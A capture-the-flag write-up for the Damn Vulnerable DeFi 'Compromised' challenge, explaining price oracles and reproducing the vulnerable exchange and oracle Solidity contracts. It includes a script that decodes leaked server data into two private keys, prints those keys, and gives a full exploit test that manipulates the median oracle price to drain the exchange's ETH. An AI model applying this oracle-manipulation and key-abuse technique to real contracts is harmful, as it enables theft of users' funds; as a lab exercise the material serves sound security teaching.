Damn Vulnerable DeFi is a series of challenges focused on DeFi smart contract attacks. The content includes flash loan attacks, lending pools, on-chain oracles, and more. Before starting, you need to have skills related to Solidity and JavaScript. For each challenge, your task is to ensure that the unit tests for that challenge pass.
Challenge link: https://www.damnvulnerabledefi.xyz/challenges/7.html
Challenge description:
While browsing DeFi projects, you may receive some strange data from the server.
4d 48 68 6a 4e 6a 63 34 5a 57 59 78 59 57 45 30 4e 54 5a 6b 59 54 59 31 59 7a 5a 6d 59 7a 55 34 4e 6a 46 6b 4e 44 51 34 4f 54 4a 6a 5a 47 5a 68 59 7a 42 6a 4e 6d 4d 34 59 7a 49 31 4e 6a 42 69 5a 6a 42 6a 4f 57 5a 69 59 32 52 68 5a 54 4a 6d 4e 44 63 7a 4e 57 45 35
4d 48 67 79 4d 44 67 79 4e 44 4a 6a 4e 44 42 68 59 32 52 6d 59 54 6c 6c 5a 44 67 34 4f 57 55 32 4f 44 56 6a 4d 6a 4d 31 4e 44 64 68 59 32 4a 6c 5a 44 6c 69 5a 57 5a 6a 4e 6a 41 7a 4e 7a 46 6c 4f 54 67 33 4e 57 5a 69 59 32 51 33 4d 7a 59 7a 4e 44 42 69 59 6a 51 34
There is currently an on-chain exchange selling collectibles called "DVNFT," with each priced at 999 ETH. The price is provided by on-chain oracles, specifically by
0xA73209FB1a42495120166736362A1DfA9F95A105,0xe92401A4d3af5E446d93D11EEc806b1462b39D15, and0x81A5D6E50C214044bE44cA0CB057fe119097850c.Your account currently has 0.1 ETH, and you need to steal all available ETH from the exchange.
Before starting, let's briefly introduce the concept of an oracle.
An oracle is an application that retrieves, verifies, and transmits off-chain information to smart contracts running on the blockchain. In simple terms, it stores real-world data, such as weather information, ID information, delivery addresses, etc., on the blockchain.
In the world of web2, data can be obtained via http requests. In the blockchain, to obtain real-world data, it must first be stored in a smart contract on the blockchain network, and then other smart contracts can access the data by calling the contract that holds the data.
Next, let's look at the code for the smart contract for this challenge.
Exchange.solExchange contractTrustfulOracle.solOracle contractTrustfulOracleInitializer.solOracle contract initializer
Exchange Contract#
Exchange.sol
contract Exchange is ReentrancyGuard {
using Address for address payable;
// NFT token
DamnValuableNFT public immutable token;
// Oracle contract
TrustfulOracle public immutable oracle;
event TokenBought(address indexed buyer, uint256 tokenId, uint256 price);
event TokenSold(address indexed seller, uint256 tokenId, uint256 price);
constructor(address oracleAddress) payable {
token = new DamnValuableNFT();
oracle = TrustfulOracle(oracleAddress);
}
// Buy NFT
function buyOne() external payable nonReentrant returns (uint256) {
// Get the amount paid
uint256 amountPaidInWei = msg.value;
require(amountPaidInWei > 0, "Amount paid must be greater than zero");
// Get the median price from the oracle contract
uint256 currentPriceInWei = oracle.getMedianPrice(token.symbol());
// Ensure the amount paid is not less than the current price
require(amountPaidInWei >= currentPriceInWei, "Amount paid is not enough");
// Mint an NFT and send it to msg.sender
uint256 tokenId = token.safeMint(msg.sender);
// Change, refund the excess amount to msg.sender
payable(msg.sender).sendValue(amountPaidInWei - currentPriceInWei);
emit TokenBought(msg.sender, tokenId, currentPriceInWei);
return tokenId;
}
// Sell NFT
function sellOne(uint256 tokenId) external nonReentrant {
// Confirm the caller is the owner
require(msg.sender == token.ownerOf(tokenId), "Seller must be the owner");
// Ensure the NFT being sold has been approved for this contract
require(token.getApproved(tokenId) == address(this), "Seller must have approved transfer");
// Get the median price from the oracle contract
uint256 currentPriceInWei = oracle.getMedianPrice(token.symbol());
// Ensure this contract's balance is not less than the current price
require(address(this).balance >= currentPriceInWei, "Not enough ETH in balance");
// Transfer the NFT from msg.sender to this contract
token.transferFrom(msg.sender, address(this), tokenId);
// Burn the NFT corresponding to tokenId
token.burn(tokenId);
// Pay msg.sender from the contract
payable(msg.sender).sendValue(currentPriceInWei);
emit TokenSold(msg.sender, tokenId, currentPriceInWei);
}
receive() external payable {}
}
The exchange contract has two functionalities:
- Buying NFTs
- Get the price from the oracle contract
- Mint NFT for the buyer
- Change
- Selling NFTs: Selling owned NFTs to this contract
- Get the price from the oracle contract
- Transfer the NFT owned by the seller to the exchange contract
- Burn the NFT owned by the seller
- Transfer funds to the seller from the exchange contract
Oracle Contract#
TrustfulOracle.sol
contract TrustfulOracle is AccessControlEnumerable {
// Define two roles
// INITIALIZER_ROLE can set the initial price and can only be called once
// Only TRUSTED_SOURCE_ROLE can set prices
bytes32 public constant TRUSTED_SOURCE_ROLE = keccak256("TRUSTED_SOURCE_ROLE");
bytes32 public constant INITIALIZER_ROLE = keccak256("INITIALIZER_ROLE");
// Record prices: which address set which token price
mapping(address => mapping (string => uint256)) private pricesBySource;
modifier onlyTrustedSource() {
require(hasRole(TRUSTED_SOURCE_ROLE, msg.sender));
_;
}
modifier onlyInitializer() {
require(hasRole(INITIALIZER_ROLE, msg.sender));
_;
}
event UpdatedPrice(
address indexed source,
string indexed symbol,
uint256 oldPrice,
uint256 newPrice
);
constructor(address[] memory sources, bool enableInitialization) {
require(sources.length > 0);
// Assign TRUSTED_SOURCE_ROLE to sources
for(uint256 i = 0; i < sources.length; i++) {
_setupRole(TRUSTED_SOURCE_ROLE, sources[i]);
}
// Assign INITIALIZER_ROLE to msg.sender
if (enableInitialization) {
_setupRole(INITIALIZER_ROLE, msg.sender);
}
}
// Set initial prices, can only be called once, only INITIALIZER_ROLE can call
function setupInitialPrices(
address[] memory sources,
string[] memory symbols,
uint256[] memory prices
)
public
onlyInitializer
{
// Only allow one (symbol, price) per source
require(sources.length == symbols.length && symbols.length == prices.length);
// Set prices
for(uint256 i = 0; i < sources.length; i++) {
_setPrice(sources[i], symbols[i], prices[i]);
}
// Revoke INITIALIZER_ROLE from msg.sender
renounceRole(INITIALIZER_ROLE, msg.sender);
}
// Set token price, only TRUSTED_SOURCE_ROLE can set prices
function postPrice(string calldata symbol, uint256 newPrice) external onlyTrustedSource {
_setPrice(msg.sender, symbol, newPrice);
}
// Get median price
function getMedianPrice(string calldata symbol) external view returns (uint256) {
return _computeMedianPrice(symbol);
}
// Get all prices for a token
function getAllPricesForSymbol(string memory symbol) public view returns (uint256[] memory) {
// Get the number of addresses with TRUSTED_SOURCE_ROLE
uint256 numberOfSources = getNumberOfSources();
// Define a fixed-length array to store price list
uint256[] memory prices = new uint256[](numberOfSources);
// Iterate through all addresses with TRUSTED_SOURCE_ROLE
for (uint256 i = 0; i < numberOfSources; i++) {
// Get source
address source = getRoleMember(TRUSTED_SOURCE_ROLE, i);
// Get price
prices[i] = getPriceBySource(symbol, source);
}
return prices;
}
// Get price
function getPriceBySource(string memory symbol, address source) public view returns (uint256) {
return pricesBySource[source][symbol];
}
// Get the number of addresses with TRUSTED_SOURCE_ROLE
function getNumberOfSources() public view returns (uint256) {
return getRoleMemberCount(TRUSTED_SOURCE_ROLE);
}
// Set price and update pricesBySource variable
function _setPrice(address source, string memory symbol, uint256 newPrice) private {
uint256 oldPrice = pricesBySource[source][symbol];
pricesBySource[source][symbol] = newPrice;
emit UpdatedPrice(source, symbol, oldPrice, newPrice);
}
// Compute median price
function _computeMedianPrice(string memory symbol) private view returns (uint256) {
// Get the number of addresses with TRUSTED_SOURCE_ROLE
// Iterate through these roles to get the price list
// Sort prices
uint256[] memory prices = _sort(getAllPricesForSymbol(symbol));
// Calculate median price; if the list length is even, calculate the average of the two middle numbers; if odd, take the middle value
if (prices.length % 2 == 0) {
uint256 leftPrice = prices[(prices.length / 2) - 1];
uint256 rightPrice = prices[prices.length / 2];
return (leftPrice + rightPrice) / 2;
} else {
return prices[prices.length / 2];
}
}
// Sort price list using selection sort
function _sort(uint256[] memory arrayOfNumbers) private pure returns (uint256[] memory) {
for (uint256 i = 0; i < arrayOfNumbers.length; i++) {
for (uint256 j = i + 1; j < arrayOfNumbers.length; j++) {
if (arrayOfNumbers[i] > arrayOfNumbers[j]) {
uint256 tmp = arrayOfNumbers[i];
arrayOfNumbers[i] = arrayOfNumbers[j];
arrayOfNumbers[j] = tmp;
}
}
}
return arrayOfNumbers;
}
}
Although the oracle contract has a lot of code, its core function is to allow multiple addresses to set the price of a token and provide the functionality to get the median price.
From the contract source code, there doesn't seem to be any vulnerabilities. However, do you remember the strange data received from the server? Could this data possibly be a private key?
Let's write a script to try to view the account addresses using the private key.
const ethers = require('ethers')
const getPK = key => {
const keyStr = key.split(' ').join('')
const base64 = Buffer.from(keyStr, 'hex').toString('utf-8')
return Buffer.from(base64, 'base64').toString('utf-8')
}
const pk1 = getPK('4d 48 68 6a 4e 6a 63 34 5a 57 59 78 59 57 45 30 4e 54 5a 6b 59 54 59 31 59 7a 5a 6d 59 7a 55 34 4e 6a 46 6b 4e 44 51 34 4f 54 4a 6a 5a 47 5a 68 59 7a 42 6a 4e 6d 4d 34 59 7a 49 31 4e 6a 42 69 5a 6a 42 6a 4f 57 5a 69 59 32 52 68 5a 54 4a 6d 4e 44 63 7a 4e 57 45 35')
const pk2 = getPK('4d 48 67 79 4d 44 67 79 4e 44 4a 6a 4e 44 42 68 59 32 52 6d 59 54 6c 6c 5a 44 67 34 4f 57 55 32 4f 44 56 6a 4d 6a 4d 31 4e 44 64 68 59 32 4a 6c 5a 44 6c 69 5a 57 5a 6a 4e 6a 41 7a 4e 7a 46 6c 4f 54 67 33 4e 57 5a 69 59 32 51 33 4d 7a 59 7a 4e 44 42 69 59 6a 51 34')
// pk1: 0xc678ef1aa456da65c6fc5861d44892cdfac0c6c8c2560bf0c9fbcdae2f4735a9
// pk2: 0x208242c40acdfa9ed889e685c23547acbed9befc60371e9875fbcd736340bb48
const wallet1 = new ethers.Wallet(pk1)
const wallet2 = new ethers.Wallet(pk2)
console.log(wallet1.address)
// 0xe92401A4d3af5E446d93D11EEc806b1462b39D15
console.log(wallet2.address)
// 0x81A5D6E50C214044bE44cA0CB057fe119097850c
The two addresses obtained happen to be the addresses providing the prices. Therefore, the attack steps are as follows:
- Use the account address that can modify prices to set the price to 0.
- Use the attacker's account to buy the NFT.
- Set the price to the contract's balance.
- Use the attacker's account to sell the NFT.
- Restore the initial price.
The test script is as follows:
it('Exploit', async function () {
const pk1 = '0xc678ef1aa456da65c6fc5861d44892cdfac0c6c8c2560bf0c9fbcdae2f4735a9'
const pk2 = '0x208242c40acdfa9ed889e685c23547acbed9befc60371e9875fbcd736340bb48'
const wallet1 = new ethers.Wallet(pk1, ethers.provider)
const wallet2 = new ethers.Wallet(pk2, ethers.provider)
// Set price to 0
await this.oracle.connect(wallet1).postPrice('DVNFT', 0)
await this.oracle.connect(wallet2).postPrice('DVNFT', 0)
// Buy NFT
await this.exchange.connect(attacker).buyOne({ value: 1 })
const filter = this.exchange.filters.TokenBought(attacker.address)
const event = (await this.exchange.queryFilter(filter)).pop()
const tokenId = event.args[1]
// Set price to contract balance
await this.oracle.connect(wallet1).postPrice('DVNFT', EXCHANGE_INITIAL_ETH_BALANCE)
await this.oracle.connect(wallet2).postPrice('DVNFT', EXCHANGE_INITIAL_ETH_BALANCE)
// Approve the exchange contract
await this.nftToken.connect(attacker).approve(this.exchange.address, tokenId)
// Sell NFT
await this.exchange.connect(attacker).sellOne(tokenId)
// Restore initial price
await this.oracle.connect(wallet1).postPrice('DVNFT', INITIAL_NFT_PRICE)
await this.oracle.connect(wallet2).postPrice('DVNFT', INITIAL_NFT_PRICE)
})
Finally, executing yarn compromised passes the test!